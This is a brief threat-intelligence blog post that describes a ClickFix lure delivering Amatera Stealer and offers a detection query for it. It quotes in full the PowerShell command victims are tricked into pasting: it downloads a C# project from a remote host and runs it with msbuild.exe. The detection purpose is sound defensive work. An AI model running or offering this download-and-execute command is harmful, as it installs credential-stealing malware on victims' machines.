172. Another Curious ClickFix PowerShell Command

Hello everyone! I think already everybody knows about ClickFix technique, but we still see new and new variations, especially if we are talking about a command a victim should paste. Proofpoint has published a report on Amatera Stealer , and the adversary leveraged ClickFix technique to deliver it. The victim should paste the following command into the Windows Run dialog: powershell -w h -c "$p=$env: TEMP+'\t.csproj';irm https://cv[.]cbrw[.]ru/t.csproj -0 $p;&($env: SystemRoot+'\Microsoft.NET\Framework\v4.0.30319\msbuild.exe') $p" The threat actors abuse PowerShell to download a malicious C# project file from a remote server, save it to the temporary directory, and executes it using msbuild.exe . So, as always, we can use suspicious command line arguments for detection, for example: event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: (*msbuild* AND *csproj*) See you tomorrow!